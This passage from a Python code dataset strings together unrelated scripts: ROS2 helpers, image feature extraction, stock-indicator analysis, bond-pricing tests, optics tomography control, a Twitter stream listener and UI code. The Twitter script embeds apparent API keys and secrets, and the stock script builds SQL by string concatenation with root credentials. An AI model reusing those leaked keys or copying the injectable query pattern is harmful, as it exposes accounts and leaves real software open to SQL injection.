ParameterType.PARAMETER_BOOL: 'boolean',\n ParameterType.PARAMETER_INTEGER: 'integer',\n ParameterType.PARAMETER_DOUBLE: 'double',\n ParameterType.PARAMETER_STRING: 'string',\n ParameterType.PARAMETER_BYTE_ARRAY: 'byte array',\n ParameterType.PARAMETER_BOOL_ARRAY: 'boolean array',\n ParameterType.PARAMETER_INTEGER_ARRAY: 'integer array',\n ParameterType.PARAMETER_DOUBLE_ARRAY: 'double array',\n ParameterType.PARAMETER_STRING_ARRAY: 'string array',\n ParameterType.PARAMETER_NOT_SET: 'not set',\n }\n return mapping[parameter_type]\n\n\nclass ParameterNameCompleter:\n \"\"\"Callable returning a list of parameter names.\"\"\"\n\n def __call__(self, prefix, parsed_args, **kwargs):\n with DirectNode(parsed_args) as node:\n parameter_names = call_list_parameters(\n node=node, node_name=parsed_args.node_name)\n return [\n n for n in parameter_names\n if not prefix or n.startswith(prefix)]\n","sub_path":"ros2param/ros2param/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"212276426","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport os\n\n\ndef mkdir(path):\n os.mkdir(path)\n\n\ndef mkdirs(paths):\n for path in paths:\n mkdir(path)\n\n\ndef tee(saveto, *args, **kwargs):\n \"\"\"Mimic the tee command, write on both stdout and file\n \"\"\"\n print(*args, **kwargs)\n if saveto is not None:\n print(file=saveto, *args, **kwargs)\n\n\ndef split_files(model_file, system_file, model_dir, system_dir, eos=\".\"):\n def outputs(line, f):\n split_sen = \" .\\n\".join(line.split(\" %s \" % eos))\n print(split_sen, end=\"\", file=f)\n\n with open(model_file) as fmodel:\n for (i, line) in enumerate(fmodel):\n if not line:\n break\n if len(line) == 0:\n continue\n\n with open(\"%s/m.A.%d.txt\" % (model_dir, i), \"w\") as f:\n outputs(line, f)\n\n with open(system_file) as fsystem:\n for (i, line) in enumerate(fsystem):\n if not line:\n break\n if len(line) == 0:\n continue\n\n with open(\"%s/s.%d.txt\" % (system_dir, i), \"w\") as f:\n outputs(line, f)\n","sub_path":"files2rouge/build/lib/files2rouge/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"429109052","text":"import os\nfrom glob import glob\nimport numpy as np\nimport pandas as pd\nimport cv2\nimport torch.nn as nn\nimport torchvision.models as models\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\nimport h5py\nimport pickle\n\n# Ignore warinings\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\nimport arg_extractor\n\n\nclass ImageDataset(Dataset):\n '''Images dataset'''\n\n def __init__(self, image_paths, transform=None):\n '''\n :param root_dir: Root directory from which we will open the images\n :param transform: Optional transform to be applied on a image\n '''\n self.transform = transform\n self.image_paths = image_paths\n\n def __len__(self):\n return len(self.image_paths)\n\n def __getitem__(self, idx):\n img_path = self.image_paths[idx]\n img_id = int(img_path.split(\"/\")[-1].split(\".\")[0])\n image = cv2.imread(img_path)\n\n # if not(image is None):\n image = image[:,:,:3]\n # else:\n # image = np.zeros((256, 256, 3),dtype=float)\n\n if self.transform:\n sample = self.transform(image)\n return {'image': sample, 'image_id': img_id}\n\n\nclass Rescale(object):\n \"\"\"Rescale the image in a sample to a given size.\"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n self.output_size = output_size\n\n def __call__(self, sample):\n image = sample\n\n h, w = image.shape[:2]\n if isinstance(self.output_size, int):\n if h > w:\n new_h, new_w = self.output_size * h / w, self.output_size\n else:\n new_h, new_w = self.output_size, self.output_size * w / h\n else:\n new_h, new_w = self.output_size\n\n new_h, new_w = int(new_h), int(new_w)\n\n img = cv2.resize(image, (new_h, new_w))\n return img\n\n\nclass RandomCrop(object):\n \"\"\"Crop randomly the image in a sample.\"\"\"\n\n def __init__(self, output_size):\n \"\"\"\n :param output_size: Desired output size. If int, square crop is made.\n \"\"\"\n assert isinstance(output_size, (int, tuple))\n if isinstance(output_size, int):\n self.output_size = (output_size, output_size)\n else:\n assert len(output_size) == 2\n self.output_size = output_size\n\n def __call__(self, sample):\n image = sample\n\n h, w = image.shape[:2]\n new_h, new_w = self.output_size\n\n top = np.random.randint(0, h - new_h)\n left = np.random.randint(0, w - new_w)\n\n image = image[top: top + new_h,\n left: left + new_w]\n\n return image\n\nargs, device = arg_extractor.get_args()\nprint(args)\n\ndict = pickle.load(open('dataset/Image_embed_dict.pickle', 'rb'))\n\ncomposed = transforms.Compose([Rescale(256),\n RandomCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\ngeneral_path = \"/home/s1885778/nrl/dataset/Images_/Images_\"\n\nresnet152 = models.resnet152(pretrained=True)\nresnet152_extract = nn.Sequential(*list(resnet152.children())[:-1])\nresnet152 = resnet152_extract\nresnet152.to(device)\n\narr = list(dict.keys())[args.seed*5 : (args.seed+1)*5]\n\nfor item in arr:\n image_paths = []\n image_ids = dict[item]\n for id in image_ids:\n temp = general_path + str(item) + \"/\" + str(id)\n image_paths.append(temp)\n\n\n image_dataset = ImageDataset(image_paths=image_paths, transform=composed)\n print(len(image_dataset))\n dataload = DataLoader(image_dataset, batch_size=args.batch_size, num_workers=0)\n\n\n features = []\n ids = []\n for i_batch, sample_batched in enumerate(dataload):\n # Get image features\n print(\"Put images on device: \" + str(device))\n input = sample_batched['image'].to(device)\n print(\"Put them through the pretrained network...\")\n batch_features = resnet152.forward(input)\n # Reshape output from the last layer of the resnet\n print(\"Return data on CPU\")\n batch_features = batch_features.cpu()\n print(batch_features.shape)\n batch_features = batch_features.reshape(batch_features.shape[0], batch_features.shape[1])\n # Use detach to imply that I don't need gradients\n # Turn tensor into numpy array\n # Save each image feature with its corresponing img_id\n print(\"Add batch to list...\")\n batch_features = batch_features.detach().numpy().astype(float)\n for i, id in enumerate(sample_batched['image_id']):\n ids.append(int(id))\n features.append(batch_features[i, :])\n\n # Saving the data\n save_file_path = \"/home/s1885778/nrl/dataset/resnet152_1/image_features_\" + str(item) + \".hdf5\"\n print(\"Saving file: \" + save_file_path + \" ...\")\n data_file = h5py.File(save_file_path, 'w')\n data_file.create_dataset(\"image_id\", data=ids)\n data_file.create_dataset(\"image_features\", data=features)\n","sub_path":"image_feature_extraction.py","file_name":"image_feature_extraction.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"508140933","text":"import numpy as np\nimport pymysql\nimport logisticV3\n\n\ndef readDataFromDatabase(code=\"sh513050\"):\n conn = pymysql.connect(host='127.0.0.1', user='root', password='root', database='stock_project', charset='utf8')\n cursor = conn.cursor()\n sql = \"select * from stock_transaction_info where code = '\" + code + \"';\"\n cursor.execute(sql)\n result = cursor.fetchall()\n # value = ret['name']\n cursor.close()\n conn.close()\n return result\n\n\nP = 14\n\n\ndef calculateCCI(data, P):\n OPEN = 0\n HIGH = 1\n LOW = 2\n CLOSE = 3\n # data = getData()\n typePrice = (data[:, LOW] + data[:, CLOSE] + data[:, HIGH]) / 3.0\n len_typePrice = len(typePrice)\n MAArr = []\n MDArr = []\n for i in range(P - 1):\n MAArr.append(0.0)\n for i in range(P - 1, len_typePrice):\n sum_of_type_price = sum(typePrice[i - P + 1: i + 1] / P)\n MAArr.append(np.round(sum_of_type_price, 2))\n for i in range(P - 1):\n MDArr.append(0.001)\n for i in range(P - 1, len_typePrice):\n np_abs = np.abs(np.array(typePrice[i - P + 1:i + 1] - MAArr[i]))\n np_res = np.round(np_abs, 2)\n MDValue = np.sum(np_res) / P\n MDArr.append(MDValue)\n CCI = (typePrice - MAArr) / (np.array(MDArr) * 0.015)\n return CCI\n\n\ndef anliaze(closeValue, cciList, code):\n len_cciList = len(cciList)\n tdtime = []\n for i in range(len_cciList):\n tdtime.append(0)\n print(cciList)\n\n time = 0\n for i in range(P + 1, len_cciList):\n if cciList[i] > -20:\n tdtime[i] = 0\n elif cciList[i - 1] < -100 < cciList[i]:\n tdtime[i] = tdtime[i - 1] + 1\n else:\n tdtime[i] = tdtime[i - 1]\n pass\n\n count = 0\n successCount = 0\n for i in range(P + 1, len_cciList - 1):\n if cciList[i - 1] < -100 < cciList[i] and closeValue[i - 1] > closeValue[i] and tdtime[i] >= 3:\n count += 1\n isSuccess = 0\n for j in range(1, 6):\n if dateList[i] == 20180704:\n a = 1 + 1\n if closeValue[i + j] > closeValue[i]:\n isSuccess = 1\n successCount += isSuccess\n if isSuccess == 0:\n print(code, tdtime[i], dateList[i])\n\n print(count)\n print(successCount)\n\n\nif __name__ == '__main__':\n code = \"sz200028\"\n data = readDataFromDatabase(code)\n dateList = [i[8] for i in data]\n openValue = [i[2] for i in data]\n closeValue = [i[3] for i in data]\n highValue = [i[4] for i in data]\n lowValue = [i[5] for i in data]\n d = [openValue, closeValue, highValue, lowValue]\n data = np.transpose(np.array(d))\n cciList = calculateCCI(data, 14)\n anliaze(closeValue, cciList, code)\n","sub_path":"CCIOb.py","file_name":"CCIOb.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"329770198","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\ndescription\r\n\"\"\"\r\n\r\n__author__ = \"Kelzenberg.Ralf\"\r\n__copyright__ = \"Copyright 2012, Kelzenberg.Ralf\"\r\n__credits__ = [\"Kelzenberg.Ralf\"]\r\n__license__ = \"GPL\"\r\n__version__ = \"$Rev$\"\r\n__maintainer__ = \"Kelzenberg.Ralf\"\r\n__email__ = \"mail@ralfkelzenberg.de\"\r\n__status__ = \"Alpha\"\r\n\r\nfrom Graphics.diagram_layout_maker import Diagramm_Layout_Maker as diagram_layout\r\nfrom Database.oracle import Oracle\r\n\r\nif __name__ == '__main__':\r\n dialay = diagram_layout()\r\n\r\n sql = (\"select we_mal_stoezeit_kaa/we_mal_stoezeit_kad, (we_mal_stoezeit_kaa+we_mal_stoezeit_kad)/2 from\"\r\n \"auftreinh where we_mal_stoezeit_kad > 0 and we_mal_stoezeit_kaa is not NULL\")\r\n res = Oracle().executeSQL(sql) # daten holen (hier nur die y Werte)\r\n x = [i[0] for i in res]\r\n w = [i[1] for i in res]\r\n dialay.add_histplot(x=x,\r\n weightslist=w, bins=100)\r\n dialay.show()\r\n","sub_path":"naos-python/Library/Examples/histgraph.py","file_name":"histgraph.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"307580644","text":"import unittest\n\nfrom fixed_income import bonds\n\n\nclass TestFunctions(unittest.TestCase):\n def test_ytm_equals_coupon_rate(self):\n face_value = 100\n coupon = 6.5\n expected = coupon / face_value\n actual = bonds.yield_to_maturity(bond_price=face_value, face_value=face_value, periods=8, coupon=coupon)\n self.assertAlmostEqual(actual, expected)\n\n def test_price_equals_cash_flows_when_ytm_is_zero(self):\n face_value = 100\n coupon = 6.5\n periods = 8\n expected = coupon * periods + face_value\n actual = bonds.price(ytm=0, face_value=face_value, periods=periods, coupon=coupon)\n self.assertAlmostEqual(actual, expected)\n\n\nclass TestClasses(unittest.TestCase):\n def test_non_int_periods_causes_assertion_error(self):\n with self.assertRaises(AssertionError):\n bonds.Bond(face_value=100, coupon=5, periods=2.5, ytm=0.03)\n\n def test_price_equals_par_when_coupon_equals_ytm(self):\n face_value = 100\n ytm = 0.07\n coupon = ytm * face_value\n bond = bonds.Bond(face_value=face_value, coupon=coupon, ytm=ytm, periods=12)\n self.assertAlmostEqual(bond.price, face_value)\n\n def test_duration_of_zero_equals_periods(self):\n expected = 7\n zcb = bonds.ZeroCoupon(face_value=100, periods=expected, ytm=0.05)\n self.assertAlmostEqual(zcb.duration, expected)\n\n def test_from_price(self):\n face_value = 100\n coupon = 6.5\n periods = 8\n ytm = coupon / face_value\n actual = bonds.Bond.from_price(bond_price=face_value, face_value=face_value, periods=periods, coupon=coupon)\n expected = bonds.Bond(ytm=ytm, face_value=face_value, periods=periods, coupon=coupon)\n self.assertEqual(actual, expected)\n\n def test_cash_flow_iteration(self):\n face_value = 100\n coupon = 7\n periods = 2\n bond = bonds.Bond(ytm=0.01, face_value=face_value, periods=periods, coupon=coupon)\n actual = list(bond)\n expected = [(1, coupon), (2, coupon + face_value)]\n self.assertEqual(actual, expected)\n\n def test_coupon_bond_duration(self):\n \"\"\"Based question 23a chapter 16 of Bodie Kane Marcus - Investments (10th Ed)\"\"\"\n bond = bonds.Bond(ytm=0.07, face_value=100, periods=10, coupon=7)\n expected = 7.51523225\n self.assertAlmostEqual(bond.duration, expected)\n\n def test_coupon_bond_convexity(self):\n \"\"\"Based question 23b chapter 16 of Bodie Kane Marcus - Investments (10th Ed)\"\"\"\n bond = bonds.Bond(ytm=0.07, face_value=100, periods=10, coupon=7)\n expected = 64.9329593\n self.assertAlmostEqual(bond.convexity, expected)\n\n def test_perpetiuty_duration(self):\n ytm = 0.07\n perpetuity = bonds.Perpetuity(ytm=ytm, coupon=1)\n expected = (1 + ytm) / ytm\n self.assertAlmostEqual(perpetuity.duration, expected)\n\n def test_perpetiuty_convexity(self):\n ytm = 0.07\n perpetuity = bonds.Perpetuity(ytm=ytm, coupon=1)\n expected = 2 / ytm ** 2\n self.assertAlmostEqual(perpetuity.convexity, expected)\n\n def test_coupon_bond_price_change_without_convexity(self):\n \"\"\"Based question 23c chapter 16 of Bodie Kane Marcus - Investments (10th Ed)\"\"\"\n bond = bonds.Bond(ytm=0.07, face_value=100, periods=10, coupon=7)\n actual = bond.price_change(ytm_change=0.01)\n expected = -7.02358154\n self.assertAlmostEqual(actual, expected)\n\n def test_coupon_bond_price_change_with_convexity(self):\n \"\"\"Based question 23d chapter 16 of Bodie Kane Marcus - Investments (10th Ed)\"\"\"\n bond = bonds.Bond(ytm=0.07, face_value=100, periods=10, coupon=7)\n actual = bond.price_change(ytm_change=0.01, use_convexity=True)\n expected = -6.69891674\n self.assertAlmostEqual(actual, expected)","sub_path":"test/test_bonds.py","file_name":"test_bonds.py","file_ext":"py","file_size_in_byte":3856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"642464129","text":"from setuptools import find_packages\nfrom setuptools import setup\n\ninstall_requires = [\n \"flask\",\n \"flask_mongoengine\",\n \"bcrypt\",\n \"flask_pymongo\",\n \"pytz\",\n \"gunicorn\",\n \"sentry-sdk[flask]==0.10.1\",\n \"flask_classy\",\n \"requests\"\n]\n\nsetup(\n name=\"fitr_webapp\",\n version=\"1.0.4\",\n url=\"https://fitr.gq\",\n license=\"None\",\n maintainer=\"CDF\",\n maintainer_email=\"howzitcallum@gmail.com\",\n description=\"Fitness App\",\n long_description=\"Fitness App\",\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n install_requires=install_requires,\n extras_require={\"test\": [\"pytest\", \"coverage\"]},\n scripts=['./fitr_webapp/scripts/init_db',\n './fitr_webapp/scripts/start_dev']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"520220321","text":"import sqlite3\n\ncon = sqlite3.connect(\"C:\\\\Users\\harshit.kacker\\harshit.db\")\ncr=con.cursor()\n#cr.execute(\"SELECT * from emp\")\n#cr.execute(\"INSERT into emp values (?,?)\",(int(input(\"Enter,id\")), input(\"Enter,name\")))\n#print(\"value added\")\n#cr.execute(\"UPDATE emp set name=? where id=?\",(input(\"Enter new name\"),int(input(\"Enter id to change\"))))\n#print(\"value updated\")\ncr.execute(\"DELETE from emp where id=?\",(int(input(\"enter the id\")),))\nprint(\"value deleted\")\ncon.commit();\n\n\"\"\"print(cr.fetchall())\nprint(cr.fetchone())\nprint(cr.fetchone())\nprint(cr.fetchone())\"\"\"\n\n\"\"\"mylist = cr.fetchmany(3)\nfor val in mylist :\n for data in val :\n print(data) \n \nfor val in mylist :\n print(val[0],\" \",val[1]) \"\"\"","sub_path":"Basics/sql_connector.py","file_name":"sql_connector.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"15814789","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 11 12:38:28 2016\n\n@author: luca\n\"\"\"\n\nimport time\nimport sys\nimport numpy as np\n\nsys.path.append('..')\nimport aptlib\nsys.path.append('/home/sagnac/Quantum/ttag/python/')\nimport ttag\n\n# buffer number\nbufNum = 0\n\nIntegrationTime = 5.\nCoincidenceRadius = 1e-9\n\n# Channel delays\nDelays = [0, 0.3, -9.8, -9.1]\n\n# Serial Numbers of APT controllers\nSNAliceHWP = 83830445\nSNAliceQWP = 83865112\nSNBobHWP = 83825706\nSNBobQWP = 83865359\n\n# Set off angles of rotators\nzeroAngle = {'AliceHWP': 30.5,\n 'AliceQWP': 2,\n 'BobHWP': 131,\n 'BobQWP': 23.5\n }\n \n# Measurement configurations: wave plates positions\n# Structure of the dictionary: 'BasisName':[HWPangle, QWPangle] angles are in degrees\n#MeasurementsConf = {'HV': [0.,0.], 'VH': [45.,0.], 'DA': [22.5, 45.], 'AD': [67.5, 45.], 'RL': [22.5, 0.], 'LR': [67.5, 0.]}\nMeasurementsConf = {'HV': [0.,0.], 'DA': [22.5, 45.], 'RL': [22.5, 0.]}\n\n#OrderOfMeasuredBases = ['HV', 'VH', 'DA', 'AD', 'RL', 'LR']\nOrderOfMeasuredBases = ['HV', 'DA', 'RL']\n\n# Homing the plates\ndef HomingWP():\n conAliceHWP.home()\n conAliceQWP.home()\n conBobHWP.home()\n conBobQWP.home()\n\n# Move all rotators to their set off angle \ndef MoveToZeroAngle():\n conAliceHWP.goto(float(zeroAngle['AliceHWP']))\n conAliceQWP.goto(float(zeroAngle['AliceQWP']))\n conBobHWP.goto(float(zeroAngle['BobHWP']))\n conBobQWP.goto(float(zeroAngle['BobQWP']))\n \ndef RotateWP(con, angle, name):\n con.goto(float(zeroAngle[name] + angle))\n\n##############\n# Main code\n##############\n\n# Open buffer for data acquisition\nttagBuf = ttag.TTBuffer(bufNum)\n\n# set channel delays\ndelays = np.zeros(ttagBuf.channels,dtype=np.double)\ndelays[0] = Delays[0]*1e-9\ndelays[1] = Delays[1]*1e-9 \ndelays[2] = Delays[2]*1e-9 \ndelays[3] = Delays[3]*1e-9 \n\n# Connect APT controllers\nconAliceHWP = aptlib.PRM1(serial_number=SNAliceHWP)\nconAliceQWP = aptlib.PRM1(serial_number=SNAliceQWP)\nconBobHWP = aptlib.PRM1(serial_number=SNBobHWP)\nconBobQWP = aptlib.PRM1(serial_number=SNBobQWP)\n\n# Homing plates\nHomingWP()\nprint('Homing DONE')\n\n# Set plates to zero angle\nMoveToZeroAngle()\nprint('Plates to Zero')\n\n# Initialize dictionary to save coincidences\n#Measurements = {'HVHV': 0,\n# 'HVDA': 0,\n# 'HVRL': 0,\n# 'DAHV': 0,\n# 'DADA': 0,\n# 'DARL': 0,\n# 'RLHV': 0,\n# 'RLDA': 0,\n# 'RLRL': 0}\nMeasurements={}\nfor Alice in OrderOfMeasuredBases:\n # Move Alice's plates\n RotateWP(conAliceHWP, MeasurementsConf[Alice][0], 'AliceHWP')\n RotateWP(conAliceQWP, MeasurementsConf[Alice][1], 'AliceQWP')\n \n for Bob in OrderOfMeasuredBases:\n # Move Bob's plates\n RotateWP(conBobHWP, MeasurementsConf[Bob][0], 'BobHWP')\n RotateWP(conBobQWP, MeasurementsConf[Bob][1], 'BobQWP')\n print('Bases: Alice', Alice, ' Bob', Bob)\n # Wait integration time + half a second\n time.sleep( IntegrationTime + 1.0 )\n \n #Aquire data, saving coincidences\n cMatrix = ttagBuf.coincidences(IntegrationTime, CoincidenceRadius, -delays)[0:4,0:4]\n \n #RotateWP(conAliceHWP, MeasurementsConf[Alice][0] + 45., 'AliceHWP')\n #RotateWP(conBobHWP, MeasurementsConf[Bob][0] + 45., 'BobHWP')\n \n #c2 = ttagBuf.coincidences(IntegrationTime, CoincidenceRadius, -delays)[0:4,0:4]\n #cMatrix = [c1, c2]\n print(cMatrix)\n #print(cMatrix[0])\n Measurements[Alice+Bob] = cMatrix\n \n# Save measurements\nnp.save('Tomography.npy',Measurements)\nprint('Measurements saved')\n\nRotateWP(conAliceHWP, 0., 'AliceHWP')\nRotateWP(conAliceQWP, 0., 'AliceQWP')\nRotateWP(conBobHWP, 0., 'BobHWP')\nRotateWP(conBobQWP, 0., 'BobQWP')\n","sub_path":"TwoQubitsTomographyMeasurements.py","file_name":"TwoQubitsTomographyMeasurements.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"602772861","text":"from tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport time\n\nckey = 'B6tZdUyY6vHnMWYW79J9sUZzS'\ncsecret = 'F6n10hAo2n8VQFSNQEXliLCNRxjtJwshInF6A95RbZoUViaYOA'\natoken = '787526326018117632-KlRhZDNMxddJQJsHvpDZYMmz5cUaJiX'\nasecret = 'VBspTZpYNjQ7A1nxrZWB8Mp6rJCzBlUB7rPFismnmDzNK'\n\nclass listener(StreamListener):\n def on_data(self, data):\n try:\n print(data)\n saveFile = open(\"f:\\\\tweets.csv\",\"a\")\n saveFile.write(data)\n saveFile.write('\\n')\n saveFile.close()\n return(True)\n except BaseException as e:\n print('failed ondata,',str(e))\n time.sleep(5)\n\ndef on_error(self, status):\n print(status)\n\nauth = OAuthHandler(ckey, csecret)\nauth.set_access_token(atoken, asecret)\n\ntwitterStream = Stream(auth, listener())\ntwitterStream.filter(track=['Construction Worker','Helmet'])","sub_path":"twitterhdata.py","file_name":"twitterhdata.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"19122180","text":"import asyncio\nimport websockets\nimport numpy as np\nimport cv2\nimport mss\nimport mss.tools\n\nconnected = set()\nseen_worker_ids = []\ndata = [0,0]\nasync def server(websocket, path):\n lastName = None\n while True:\n async for message in websocket:\n if message not in seen_worker_ids or message == \"\":\n seen_worker_ids.append(message)\n\n sample_number = data[0]\n observationType = data[1]\n\n print (\"sending \" + str(sample_number) + \",\" + str(observationType))\n\n await websocket.send(str(sample_number) + \",\" + str(observationType))\n sample_number = int(sample_number)\n observationType = int(observationType)\n\n if observationType < 3:\n observationType +=1\n else:\n observationType = 0\n sample_number+=1\n if sample_number >= 30:\n sample_number = 0\n data[0] = str(sample_number)\n data[1] = str(observationType)\n\nstart_server = websockets.serve(server, \"localhost\", 3000)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()\n","sub_path":"workerHandlerSocket.py","file_name":"workerHandlerSocket.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"268995757","text":"import logging\n\nfrom astropy import modeling\nfrom astropy import units as u, constants as const\nimport pandas as pd\nimport h5py\nfrom scipy import interpolate\nimport numpy as np\n\n#from starkit.base.parameter import StarKitParameter as Parameter\nfrom astropy.modeling import Parameter\nfrom starkit.fitkit.priors import UniformPrior\n\nlogger = logging.getLogger(__name__)\n\nclass BaseSpectralGrid(modeling.Model):\n inputs = tuple()\n outputs = ('wavelength', 'flux')\n\n def __init__(self, wavelength, index, fluxes, **kwargs):\n self.R = kwargs.pop('R', None)\n self.R_sampling = kwargs.pop('R_sampling', None)\n self.flux_unit = kwargs.pop('flux_unit', None)\n self.index = index\n self.fluxes = fluxes\n\n super(BaseSpectralGrid, self).__init__(**kwargs)\n self.interpolator = self._generate_interpolator(index, fluxes)\n self.wavelength = wavelength\n\n def get_grid_extent(self):\n extents = []\n for i, param_name in enumerate(self.param_names):\n extents.append((self.interpolator.points[:, i].min(),\n self.interpolator.points[:, i].max()))\n return extents\n\n def get_grid_uniform_priors(self):\n extents = self.get_grid_extent()\n priors = []\n for extent in extents:\n priors.append(UniformPrior(*extent))\n\n return priors\n\n def evaluate(self, *args):\n\n return self.wavelength, self.interpolator(np.array(\n args).reshape(len(self.param_names)))[0]\n\n @staticmethod\n def _generate_interpolator(index, fluxes):\n return interpolate.LinearNDInterpolator(index, fluxes)\n\n @property\n def velocity_per_pix(self):\n if self.R is None:\n raise ValueError('R and R_sampling for the current grid not known')\n\n else:\n return const.c / self.R / self.R_sampling\n\n def _renormalize_grid(self):\n for i in xrange(self.fluxes.shape[0]):\n self.fluxes[i] /= np.trapz(self.fluxes[i], self.wavelength)\n\n\ndef load_grid(hdf_fname):\n \"\"\"\n Load the grid from an HDF file\n\n Parameters\n ----------\n hdf_fname: ~str\n filename and path to the HDF file\n\n Returns\n -------\n : SpectralGrid object\n\n \"\"\"\n logger.info('Reading index')\n index = pd.read_hdf(hdf_fname, 'index')\n meta = pd.read_hdf(hdf_fname, 'meta')\n logger.info('Discovered columns {0}'.format(', '.join(meta['parameters'])))\n interpolate_parameters = meta['parameters']\n\n with h5py.File(hdf_fname) as fh:\n logger.info('Reading Fluxes')\n fluxes = fh['fluxes'].__array__()\n logger.info('Fluxes shape {0}'.format(fluxes.shape))\n flux_unit = u.Unit(meta['flux_unit'])\n wavelength = pd.read_hdf(hdf_fname, 'wavelength').values[:, 0]\n wavelength = u.Quantity(wavelength, meta['wavelength_unit'])\n\n if meta['grid_type'] == 'log':\n R = meta['R']\n R_sampling = meta['R_sampling']\n else:\n raise ValueError('No other grid_type than log is supported')\n\n parameter_defaults = {}\n parameter_defaults = {param: index.loc[index.index[0], param]\n for param in interpolate_parameters}\n\n class_dict = {}\n for param in interpolate_parameters:\n if parameter_defaults[param] is None:\n param_descriptor = Parameter()\n else:\n param_descriptor = Parameter(default=parameter_defaults[param])\n\n class_dict[param] = param_descriptor\n\n class_dict['__init__'] = BaseSpectralGrid.__init__\n\n SpectralGrid = type('SpectralGrid', (BaseSpectralGrid, ), class_dict)\n\n initial_parameters = {item: index[item].iloc[0]\n for item in interpolate_parameters}\n logger.info('Initializing spec grid')\n spec_grid = SpectralGrid(wavelength, index[interpolate_parameters], fluxes,\n R=R, R_sampling=R_sampling, flux_unit=flux_unit,\n **initial_parameters)\n\n logger.info('Setting grid extent')\n for param in interpolate_parameters:\n uniform_prior = UniformPrior(index[param].min(), index[param].max())\n parameter = getattr(spec_grid, param)\n parameter.prior = uniform_prior\n\n return spec_grid\n","sub_path":"starkit/gridkit/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"90662983","text":"\nfrom .ui_tab_in_notebook import *\nfrom .ui_show_list import *\nfrom .ui_show_item import *\nfrom .ui_edit_item import *\n\nclass UIItemList(UITabInNB):\n def __init__(self, parent, tab_name, organizer): \n super().__init__(parent, tab_name)\n self.item_list = organizer.item_list\n self.priority_list = organizer.priority_list\n self.contact_info_book = organizer.contact_info_book\n self.show = 'current list only'\n self.frame_show_list = UIShowList(self)\n self.frame_show_item = UIShowItem(self)\n self.frame_edit_item = UIEditItem(self)\n\n def set_controller(self, controller):\n self.controller = controller\n self.frame_show_list.controller = controller\n self.frame_show_item.controller = controller\n self.frame_edit_item.controller = controller\n\n def refresh_list(self, new_list=None):\n self.frame_show_list.refresh(new_list)\n self.frame_show_list.grid(row=0, column=0, sticky=N)\n \n def refresh_item(self, item=None):\n self.frame_show_item.refresh(item)\n self.frame_edit_item.grid_remove()\n self.frame_show_item.grid(row=0, column=1, sticky=N)\n\n def edit_item_mode(self, item):\n self.frame_edit_item.refresh(item)\n self.frame_show_item.grid_remove()\n self.frame_edit_item.grid(row=0, column=1, sticky=N)\n\n\n\n","sub_path":"want_to_list/view/ui_item_list.py","file_name":"ui_item_list.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"464140620","text":"#\n# 325 = 1% haste\n# 350 = 1% mastery\n# 350 = 1% crit\n# 400 = 1% vers damage/healing = 0.5% damage reduction\n#\n\nimport copy, math, time, os, random, sys\nimport multiprocessing\nfrom events import *\nfrom sim import *\n\nconfigtemplate = {\n\t\"base stagger\": 0.35,\n\t\"isb stagger\": 0.40,\n\t\"brew recharge time\": 18,\n\t\"brew max charges\": 4,\n\t\"tank health\": 600,\n\t\"base avoidance\": 10,\n\t\"haste\": 10,\n\t\"mastery\": 15,\n \"crit chance\": 0.25,\n\t\"versatility dr\": 2.5,\n\t\"versatility healing\": 5,\n\t\"stagger ticks\": 20,\n\t\"overflow chance\": 0.3,\n\t\"celestial fortune multi\": 0.6,\n\t\"talent 15\": \"\",\t#\n\t\"talent 30\": \"\",\t# \n\t\"talent 45\": \"\",\t# \"lb\" \"gotm\"\n\t\"talent 60\": \"\",\t#\n\t\"talent 75\": \"\",\t#\n\t\"talent 90\": \"\",\t#\n\t\"talent 100\": \"\"\t# \"ed\" \"fm\" \"ht\"\n}\n\ndef hiddenmultithreadedsim(bossdamageevents,\n\t\t\t\tpurifystaggerevents,\n\t\t\t\tisbuseevents,\n\t\t\t\tbreaktime,\n\t\t\t\tconfig,\n\t\t\t\tgotothreshold,\n\t\t\t\tsimulations,\n\t\t\t\toutput):\n\t\n\tres = {}\n\t\n\tfor a in range(0, 